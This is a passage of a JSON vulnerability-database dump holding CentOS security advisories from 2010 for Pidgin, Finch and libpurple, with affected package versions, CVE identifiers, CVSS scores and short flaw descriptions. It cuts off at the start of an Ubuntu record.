"pidgin-perl-2.6.6-1.el4.x86_64.rpm", "packageName": "pidgin-perl", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "finch-devel-2.6.6-1.el5.i386.rpm", "packageName": "finch-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "finch-devel-2.6.6-1.el5.i386.rpm", "packageName": "finch-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "pidgin-devel-2.6.6-1.el5.x86_64.rpm", "packageName": "pidgin-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "libpurple-perl-2.6.6-1.el4.x86_64.rpm", "packageName": "libpurple-perl", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "libpurple-devel-2.6.6-1.el4.i386.rpm", "packageName": "libpurple-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "pidgin-2.6.6-1.el5.i386.rpm", "packageName": "pidgin", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "pidgin-2.6.6-1.el5.i386.rpm", "packageName": "pidgin", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "pidgin-2.6.6-1.el4.i386.rpm", "packageName": "pidgin", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "pidgin-2.6.6-1.el4.x86_64.rpm", "packageName": "pidgin", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "libpurple-perl-2.6.6-1.el5.i386.rpm", "packageName": "libpurple-perl", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "libpurple-devel-2.6.6-1.el5.x86_64.rpm", "packageName": "libpurple-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "finch-2.6.6-1.el4.x86_64.rpm", "packageName": "finch", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "pidgin-2.6.6-1.el5.src.rpm", "packageName": "pidgin", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "pidgin-2.6.6-1.el5.src.rpm", "packageName": "pidgin", "arch": "any", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2010:0115\n\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nAn input sanitization flaw was found in the way Pidgin's MSN protocol\nimplementation handled MSNSLP invitations. A remote attacker could send a\nspecially-crafted INVITE request that would cause a denial of service\n(memory corruption and Pidgin crash). (CVE-2010-0277)\n\nA denial of service flaw was found in Finch's XMPP chat implementation,\nwhen using multi-user chat. If a Finch user in a multi-user chat session\nwere to change their nickname to contain the HTML \"br\" element, it would\ncause Finch to crash. (CVE-2010-0420)\n\nRed Hat would like to thank Sadrul Habib Chowdhury of the Pidgin project\nfor responsibly reporting the CVE-2010-0420 issue.\n\nA denial of service flaw was found in the way Pidgin processed emoticon\nimages. A remote attacker could flood the victim with emoticon images\nduring mutual communication, leading to excessive CPU use. (CVE-2010-0423)\n\nThese packages upgrade Pidgin to version 2.6.6. Refer to the Pidgin release\nnotes for a full list of changes: http://developer.pidgin.im/wiki/ChangeLog\n\nAll Pidgin users are advised to upgrade to these updated packages, which\ncorrect these issues. Pidgin must be restarted for this update to take\neffect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2010-February/016511.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-February/016512.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-February/016523.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-February/016524.html\n\n**Affected packages:**\nfinch\nfinch-devel\nlibpurple\nlibpurple-devel\nlibpurple-perl\nlibpurple-tcl\npidgin\npidgin-devel\npidgin-perl\n\n**Upstream details at:**\n\nhttps://rhn.redhat.com/errata/RHSA-2010-0115.html", "edition": 1, "reporter": "CentOS Project", "published": "2010-02-20T00:04:47", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "finch, libpurple, pidgin security update", "type": "centos", "bulletinFamily": "unix", "cvelist": ["CVE-2010-0420", "CVE-2010-0423", "CVE-2010-0277"], "modified": "2010-02-23T00:11:45", "href": "http://lists.centos.org/pipermail/centos-announce/2010-February/016511.html", "id": "CESA-2010:0115", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-10-03T18:25:07", "references": ["https://rhn.redhat.com/errata/RHSA-2010-0788.html", "http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xBEFA581B"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-5.el4", "arch": "i386", "packageName": "pidgin-perl", "packageFilename": "pidgin-perl-2.6.6-5.el4.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "i386", "packageName": "libpurple-devel", "packageFilename": "libpurple-devel-2.6.6-5.el5_5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "i386", "packageName": "libpurple-devel", "packageFilename": "libpurple-devel-2.6.6-5.el5_5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "x86_64", "packageName": "finch-devel", "packageFilename": "finch-devel-2.6.6-5.el5_5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "x86_64", "packageName": "finch", "packageFilename": "finch-2.6.6-5.el5_5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-5.el4", "arch": "x86_64", "packageName": "pidgin-perl", "packageFilename": "pidgin-perl-2.6.6-5.el4.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "x86_64", "packageName": "libpurple", "packageFilename": "libpurple-2.6.6-5.el5_5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "i386", "packageName": "pidgin-perl", "packageFilename": "pidgin-perl-2.6.6-5.el5_5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "x86_64", "packageName": "libpurple-perl", "packageFilename": "libpurple-perl-2.6.6-5.el5_5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-5.el4", "arch": "i386", "packageName": "pidgin", "packageFilename": "pidgin-2.6.6-5.el4.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "x86_64", "packageName": "pidgin-devel", "packageFilename": "pidgin-devel-2.6.6-5.el5_5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "i386", "packageName": "pidgin", "packageFilename": "pidgin-2.6.6-5.el5_5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "i386", "packageName": "pidgin", "packageFilename": "pidgin-2.6.6-5.el5_5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "i386", "packageName": "libpurple-perl", "packageFilename": "libpurple-perl-2.6.6-5.el5_5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "i386", "packageName": "libpurple-tcl", "packageFilename": "libpurple-tcl-2.6.6-5.el5_5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "i386", "packageName": "libpurple", "packageFilename": "libpurple-2.6.6-5.el5_5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "i386", "packageName": "libpurple", "packageFilename": "libpurple-2.6.6-5.el5_5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "x86_64", "packageName": "libpurple-devel", "packageFilename": "libpurple-devel-2.6.6-5.el5_5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-5.el4", "arch": "i386", "packageName": "libpurple-tcl", "packageFilename": "libpurple-tcl-2.6.6-5.el4.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-5.el4", "arch": "i386", "packageName": "libpurple", "packageFilename": "libpurple-2.6.6-5.el4.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "x86_64", "packageName": "pidgin", "packageFilename": "pidgin-2.6.6-5.el5_5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-5.el4", "arch": "x86_64", "packageName": "finch", "packageFilename": "finch-2.6.6-5.el4.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-5.el4", "arch": "x86_64", "packageName": "libpurple-tcl", "packageFilename": "libpurple-tcl-2.6.6-5.el4.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "i386", "packageName": "finch-devel", "packageFilename": "finch-devel-2.6.6-5.el5_5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "i386", "packageName": "finch-devel", "packageFilename": "finch-devel-2.6.6-5.el5_5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-5.el4", "arch": "i386", "packageName": "pidgin-devel", "packageFilename": "pidgin-devel-2.6.6-5.el4.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-5.el4", "arch": "x86_64", "packageName": "libpurple-perl", "packageFilename": "libpurple-perl-2.6.6-5.el4.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-5.el4", "arch": "i386", "packageName": "libpurple-perl", "packageFilename": "libpurple-perl-2.6.6-5.el4.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "x86_64", "packageName": "libpurple-tcl", "packageFilename": "libpurple-tcl-2.6.6-5.el5_5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-5.el4", "arch": "x86_64", "packageName": "libpurple", "packageFilename": "libpurple-2.6.6-5.el4.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-5.el4", "arch": "x86_64", "packageName": "pidgin-devel", "packageFilename": "pidgin-devel-2.6.6-5.el4.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "i386", "packageName": "pidgin-devel", "packageFilename": "pidgin-devel-2.6.6-5.el5_5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "i386", "packageName": "pidgin-devel", "packageFilename": "pidgin-devel-2.6.6-5.el5_5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-5.el4", "arch": "i386", "packageName": "libpurple-devel", "packageFilename": "libpurple-devel-2.6.6-5.el4.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "i386", "packageName": "finch", "packageFilename": "finch-2.6.6-5.el5_5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "i386", "packageName": "finch", "packageFilename": "finch-2.6.6-5.el5_5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "x86_64", "packageName": "pidgin-perl", "packageFilename": "pidgin-perl-2.6.6-5.el5_5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-5.el4", "arch": "i386", "packageName": "finch", "packageFilename": "finch-2.6.6-5.el4.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "any", "packageName": "pidgin", "packageFilename": "pidgin-2.6.6-5.el5_5.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "any", "packageName": "pidgin", "packageFilename": "pidgin-2.6.6-5.el5_5.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-5.el4", "arch": "x86_64", "packageName": "libpurple-devel", "packageFilename": "libpurple-devel-2.6.6-5.el4.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-5.el4", "arch": "any", "packageName": "pidgin", "packageFilename": "pidgin-2.6.6-5.el4.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-5.el4", "arch": "any", "packageName": "pidgin", "packageFilename": "pidgin-2.6.6-5.el4.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-5.el4", "arch": "x86_64", "packageName": "finch-devel", "packageFilename": "finch-devel-2.6.6-5.el4.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-5.el4", "arch": "i386", "packageName": "finch-devel", "packageFilename": "finch-devel-2.6.6-5.el4.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-5.el4", "arch": "x86_64", "packageName": "pidgin", "packageFilename": "pidgin-2.6.6-5.el4.x86_64.rpm", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2010:0788\n\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nMultiple NULL pointer dereference flaws were found in the way Pidgin\nhandled Base64 decoding. A remote attacker could use these flaws to crash\nPidgin if the target Pidgin user was using the Yahoo! Messenger Protocol,\nMSN, MySpace, or Extensible Messaging and Presence Protocol (XMPP) protocol\nplug-ins, or using the Microsoft NT LAN Manager (NTLM) protocol for\nauthentication. (CVE-2010-3711)\n\nA NULL pointer dereference flaw was found in the way the Pidgin MSN\nprotocol plug-in processed custom emoticon messages. A remote attacker\ncould use this flaw to crash Pidgin by sending specially-crafted emoticon\nmessages during mutual communication. (CVE-2010-1624)\n\nRed Hat would like to thank the Pidgin project for reporting these issues.\nUpstream acknowledges Daniel Atallah as the original reporter of\nCVE-2010-3711, and Pierre Nogues of Meta Security as the original reporter\nof CVE-2010-1624.\n\nAll Pidgin users should upgrade to these updated packages, which contain\nbackported patches to resolve these issues. Pidgin must be restarted for\nthis update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2010-October/017101.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-October/017102.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-October/017117.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-October/017118.html\n\n**Affected packages:**\nfinch\nfinch-devel\nlibpurple\nlibpurple-devel\nlibpurple-perl\nlibpurple-tcl\npidgin\npidgin-devel\npidgin-perl\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2010-0788.html", "edition": 1, "reporter": "CentOS Project", "published": "2010-10-21T18:51:36", "title": "finch, libpurple, pidgin security update", "type": "centos", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-1624", "CVE-2010-3711"], "modified": "2010-10-25T09:22:45", "href": "http://lists.centos.org/pipermail/centos-announce/2010-October/017101.html", "id": "CESA-2010:0788", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-10-03T18:24:57", "references": ["https://rhn.redhat.com/errata/RHSA-2010-0044.html", "http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xBEFA581B"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "x86_64", "packageName": "pidgin-devel", "packageFilename": "pidgin-devel-2.6.5-1.el4.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageName": "finch-devel", "packageFilename": "finch-devel-2.6.5-1.el4.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageName": "pidgin-devel", "packageFilename": "pidgin-devel-2.6.5-1.el4.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageName": "libpurple-devel", "packageFilename": "libpurple-devel-2.6.5-1.el4.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "x86_64", "packageName": "libpurple-tcl", "packageFilename": "libpurple-tcl-2.6.5-1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "i386", "packageName": "pidgin-devel", "packageFilename": "pidgin-devel-2.6.5-1.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "i386", "packageName": "pidgin-devel", "packageFilename": "pidgin-devel-2.6.5-1.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "x86_64", "packageName": "finch", "packageFilename": "finch-2.6.5-1.el4.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageName": "libpurple", "packageFilename": "libpurple-2.6.5-1.el4.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageName": "pidgin", "packageFilename": "pidgin-2.6.5-1.el4.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "x86_64", "packageName": "libpurple", "packageFilename": "libpurple-2.6.5-1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageName": "finch", "packageFilename": "finch-2.6.5-1.el4.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "any", "packageName": "pidgin", "packageFilename": "pidgin-2.6.5-1.el4.1.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "any", "packageName": "pidgin", "packageFilename": "pidgin-2.6.5-1.el4.1.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "x86_64", "packageName": "pidgin-devel", "packageFilename": "pidgin-devel-2.6.5-1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "x86_64", "packageName": "libpurple-tcl", "packageFilename": "libpurple-tcl-2.6.5-1.el4.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageName": "libpurple-tcl", "packageFilename": "libpurple-tcl-2.6.5-1.el4.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "x86_64", "packageName": "libpurple", "packageFilename": "libpurple-2.6.5-1.el4.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "x86_64", "packageName": "finch-devel", "packageFilename": "finch-devel-2.6.5-1.el4.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "x86_64", "packageName": "finch-devel", "packageFilename": "finch-devel-2.6.5-1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "i386", "packageName": "libpurple-perl", "packageFilename": "libpurple-perl-2.6.5-1.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "x86_64", "packageName": "libpurple-devel", "packageFilename": "libpurple-devel-2.6.5-1.el4.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "any", "packageName": "pidgin", "packageFilename": "pidgin-2.6.5-1.el5.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "any", "packageName": "pidgin", "packageFilename": "pidgin-2.6.5-1.el5.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "x86_64", "packageName": "pidgin", "packageFilename": "pidgin-2.6.5-1.el4.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "x86_64", "packageName": "finch", "packageFilename": "finch-2.6.5-1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageName": "libpurple-perl", "packageFilename": "libpurple-perl-2.6.5-1.el4.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "x86_64", "packageName": "pidgin-perl", "packageFilename": "pidgin-perl-2.6.5-1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "x86_64", "packageName": "libpurple-perl", "packageFilename": "libpurple-perl-2.6.5-1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "x86_64", "packageName": "pidgin", "packageFilename": "pidgin-2.6.5-1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "x86_64", "packageName": "libpurple-devel", "packageFilename": "libpurple-devel-2.6.5-1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "i386", "packageName": "finch-devel", "packageFilename": "finch-devel-2.6.5-1.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "i386", "packageName": "finch-devel", "packageFilename": "finch-devel-2.6.5-1.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "i386", "packageName": "libpurple", "packageFilename": "libpurple-2.6.5-1.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "i386", "packageName": "libpurple", "packageFilename": "libpurple-2.6.5-1.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "i386", "packageName": "libpurple-devel", "packageFilename": "libpurple-devel-2.6.5-1.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "i386", "packageName": "libpurple-devel", "packageFilename": "libpurple-devel-2.6.5-1.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "x86_64", "packageName": "libpurple-perl", "packageFilename": "libpurple-perl-2.6.5-1.el4.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "i386", "packageName": "pidgin", "packageFilename": "pidgin-2.6.5-1.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "i386", "packageName": "pidgin", "packageFilename": "pidgin-2.6.5-1.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "i386", "packageName": "libpurple-tcl", "packageFilename": "libpurple-tcl-2.6.5-1.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageName": "pidgin-perl", "packageFilename": "pidgin-perl-2.6.5-1.el4.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "x86_64", "packageName": "pidgin-perl", "packageFilename": "pidgin-perl-2.6.5-1.el4.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "i386", "packageName": "pidgin-perl", "packageFilename": "pidgin-perl-2.6.5-1.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "i386", "packageName": "finch", "packageFilename": "finch-2.6.5-1.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "i386", "packageName": "finch", "packageFilename": "finch-2.6.5-1.el5.i386.rpm", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2010:0044\n\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nA directory traversal flaw was discovered in Pidgin's MSN protocol\nimplementation. A remote attacker could send a specially-crafted emoticon\nimage download request that would cause Pidgin to disclose an arbitrary\nfile readable to the user running Pidgin. (CVE-2010-0013)\n\nThese packages upgrade Pidgin to version 2.6.5. Refer to the Pidgin release\nnotes for a full list of changes: http://developer.pidgin.im/wiki/ChangeLog\n\nAll Pidgin users should upgrade to these updated packages, which correct\nthis issue. Pidgin must be restarted for this update to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2010-January/016447.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-January/016448.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-January/016465.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-January/016466.html\n\n**Affected packages:**\nfinch\nfinch-devel\nlibpurple\nlibpurple-devel\nlibpurple-perl\nlibpurple-tcl\npidgin\npidgin-devel\npidgin-perl\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2010-0044.html", "edition": 1, "reporter": "CentOS Project", "published": "2010-01-14T21:33:39", "title": "finch, libpurple, pidgin security update", "type": "centos", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-0013"], "modified": "2010-01-15T00:14:04", "href": "http://lists.centos.org/pipermail/centos-announce/2010-January/016447.html", "id": "CESA-2010:0044", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "ubuntu": [{"lastseen": "2018-03-29T18:20:01", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2010-0423", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-0420", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-0277"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "9.10", "packageVersion": "1:2.6.2-1ubuntu7.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "pidgin", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.04", "packageVersion": "1:2.5.5-1ubuntu8.6", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "pidgin", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.10", "packageVersion": "1:2.5.2-0ubuntu1.7", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "pidgin", "operator": "lt"}, {"OS": 